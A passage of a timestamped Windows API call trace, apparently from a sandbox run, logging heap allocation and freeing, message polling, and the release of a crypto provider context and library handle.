lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.873] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.874] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0259.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.875] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.876] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.876] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.876] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.876] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0259.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.877] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.879] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.879] FreeLibrary (hLibModule=0x756e0000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.880] CloseHandle (hObject=0x2d0) returned 1 [0259.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.884] CloseHandle (hObject=0x2a0) returned 1 [0259.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.889] HeapFree (in: 